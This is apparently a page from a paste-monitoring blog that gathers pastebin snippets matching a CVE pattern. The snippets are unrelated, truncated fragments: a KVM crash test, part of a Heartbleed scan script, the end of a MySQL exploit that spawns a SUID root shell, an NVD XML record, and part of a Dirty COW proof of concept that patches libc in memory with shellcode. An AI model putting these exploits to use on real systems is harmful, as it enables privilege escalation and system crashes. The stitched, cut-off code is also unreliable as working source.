LeakedIn Logo
Stories About Data Leaks and Related Stuff

Posts Tagged ‘CVE Reference’

CVE Reference

0 votedvote

Detected 2 occurrence(s) of ‘CVE\-20[0-1]{1}[0-9]{1}\-[0-9]{4}’:

/* gcc -o test-cve-2016-8630 test-cve-2016-8630.c */

#include <stdio.h>

int
main(int argc, char *argv)
{
    asm volatile(".byte 0xc7\n.byte 0x15\nnop\nnop\nnop\nnop");
    printf("I did not crash this time.\n");
    return 0;
}

Source: http://pastebin.com/raw.php?i=sAhX3v1d

CVE Reference

0 votedvote

Detected 3 occurrence(s) of ‘CVE\-20[0-1]{1}[0-9]{1}\-[0-9]{4}’:

ms protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.
    ]],

    references = {
      'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160',
      'http://www.openssl.org/news/secadv_20140407.txt ',
      'http://cvedetails.com/cve/2014-0160/'
    }
  }

  local report = vulns.Report:new(SCRIPT_NAME, host, port)
  local test_vers = arg_protocols

  if type(test_vers) == 'string' the

Source: http://pastebin.com/raw.php?i=kUx4qUkU

CVE Reference

0 votedvote

Detected 4 occurrence(s) of ‘CVE\-20[0-1]{1}[0-9]{1}\-[0-9]{4}’:

ID shell\033[0m: \n\n", cnt);
     system("ls -l " SUID_SHELL);

     printf("\n[+] Spawning the \033[94mmysql SUID shell\033[0m now... \n Remember that from there you can gain \033[1;31mroot\033[0m with vuln \033[1;31mCVE-2016-6662\033[0m or \033[1;31mCVE-2016-6664\033[0m :)\n\n");
     system(SUID_SHELL " -p -i ");
     //system(SUID_SHELL " -p -c '/bin/bash -i -p'");

     /* close MySQL connection and exit */
     printf("\n[+] Job done. Exiting\n\n");
     mysql_close(conn);
     return 0;

 }

Source: http://pastebin.com/raw.php?i=P7HUhERM

CVE Reference

0 votedvote

Detected 2 occurrence(s) of ‘CVE\-20[0-1]{1}[0-9]{1}\-[0-9]{4}’:

ang:fact-ref name="cpe:/a:microsoft:excel:2010:sp2:~~~x64~~"/>
</cpe-lang:logical-test>
</vuln:vulnerable-configuration>
<vuln:vulnerable-software-list>
<vuln:product>cpe:/a:microsoft:ie:9</vuln:product>
</vuln:vulnerable-software-list>
<vuln:cve-id>CVE-2016-9991</vuln:cve-id>
<vuln:published-datetime>2016-11-07T00:00:00.000-07:58</vuln:published-datetime>
<vuln:last-modified-datetime>2016-11-07T00:00:00.000-07:58</vuln:last-modified-datetime>
<vuln:cvss>
<cvss:base_metrics>
<cvss:score>5.0</cvss:score>
<cvs

Source: http://pastebin.com/raw.php?i=6UJs99m7

CVE Reference

1 votedvote

Detected 1 occurrence(s) of ‘CVE\-20[0-1]{1}[0-9]{1}\-[0-9]{4}’:

/*
 * CVE-2016-5195 dirtypoc
 *
 * This PoC is memory only and doesn't write anything on the filesystem.
 * /!\ Beware, it triggers a kernel crash a few minutes.
 *
 * gcc -Wall -o dirtycow-mem dirtycow-mem.c -ldl -lpthread
 */

#define _GNU_SOURCE
#include <err.h>
#include 

Detected 7 occurrence(s) of ‘shellcode’:

);

	mem_arg.unpatch = malloc(sizeof(SHELLCODE)-1);
	if (mem_arg.unpatch == NULL)
		err(1, "malloc");

	memcpy(mem_arg.unpatch, (void *)getuid_addr, sizeof(SHELLCODE)-1);
	memcpy(mem_arg.patch, SHELLCODE, sizeof(SHELLCODE)-1);
	mem_arg.patch_size = sizeof(SHELLCODE)-1;
	mem_arg.do_patch = true;

	fd = open(LIBC_PATH, O_RDONLY);
	if (fd == -1)
		err(1, "open(\"" LIBC_PATH "\")");
	if (fstat(fd, &st) == -1)
		err(1, "fstat");

	mem_arg.map = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, fd, 0);
	if (mem_arg.map == MA

Source: http://pastebin.com/raw.php?i=N9hqimkz